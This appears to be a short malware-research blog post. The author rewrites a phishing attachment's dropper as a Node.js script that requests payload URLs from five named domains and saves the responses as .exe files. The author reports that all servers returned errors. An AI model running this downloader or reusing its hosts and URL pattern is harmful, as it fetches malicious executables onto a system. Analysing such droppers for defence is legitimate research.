Today I wanted to see what malware would be downloaded if someone opens the attachment of the decribed mail from the last post.

The windows script was simplified to a simple javascipt so it's easier to run on a linux machine:

var request = require("request");
var fs = require("fs");

function ge() { 
  var rt = 0; 
  try { 
    request("http://"+ll[i]+"/counter/"+x+n).pipe(fs.createWriteStream(ll[i]+'.exe')); 
  } catch(er){
    console.log(er);
  }; 
  return rt; 
} 

var i=0; 
var ll = new Array("capsynch.com", 
 "aventurarealestatedirectory.com",
 "www.pratomoscaclub.it",
 "www.apogeoform.net",
 "www.iblasoni.com"); 
var x = "?a=228567&i=Y5rzyqa6RhRlpw19Jl94p4F1b4I22hWFQ0_HjXbKHychcZyn0b_kMs1eEwV0pM5uEJsjRyZ3a1bm7F-R2AJJb7coBJcrLA&r="; 

for(var n=1;n<=2;n++) { 
  while (i<ll.length) {
    console.log('trying to get ' + ll[i]) 
    ge(); 
    i++; 
  }; 
};

As it turned out, I was too slow :(. All servers responded with a not found for an 500 Internal Server Error.

Next time i'll be faster.